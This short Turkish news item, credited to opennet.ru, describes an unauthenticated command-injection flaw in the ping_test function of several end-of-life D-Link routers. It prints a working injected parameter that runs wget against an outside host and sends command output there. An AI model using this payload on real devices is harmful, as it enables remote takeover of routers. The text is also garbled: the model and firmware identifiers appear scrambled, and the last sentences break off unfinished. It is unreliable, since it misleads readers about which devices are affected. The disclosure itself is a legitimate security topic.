D-Link kablosuz yönlendiricilerde
İlginç bir şekilde, ürün yazılımı geliştiricilerine göre, "ping_test" çağrısı yalnızca kimlik doğrulamadan sonra yürütülmelidir, ancak gerçekte web arayüzünde oturum açmaya bakılmaksızın her durumda çağrılır. Özellikle, application_sec.cgi betiğine erişip "action=ping_test" parametresini ilettiğinizde, betik kimlik doğrulama sayfasına yönlendirilir ancak aynı zamanda ping_test ile ilişkili eylemi gerçekleştirir. Kodu çalıştırmak için, test için gönderilen IP adresinin doğruluğunu düzgün bir şekilde kontrol etmeden ping yardımcı programını çağıran ping_test'in kendisinde başka bir güvenlik açığı kullanıldı. Örneğin, wget yardımcı programını çağırmak ve “echo 1234” komutunun sonuçlarını harici bir ana bilgisayara aktarmak için “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// parametresini belirtmeniz yeterlidir. test.test/?$( echo 1234)".
Güvenlik açığının varlığı aşağıdaki modellerde resmi olarak doğrulanmıştır:
- Firmware 655b3.02 veya daha eski sürümlere sahip DIR-05;
- Firmware 866b1.03 veya daha eski sürümlere sahip DIR-04L;
- Firmware 1565 veya daha eski sürüme sahip DIR-1.01;
- DIR-652 (sorunlu ürün yazılımı sürümleri hakkında bilgi verilmemiştir)
Bu modellerin destek süresi zaten dolmuştur, dolayısıyla D-Link
Daha sonra güvenlik açığının da olduğu keşfedildi
Kaynak: opennet.ru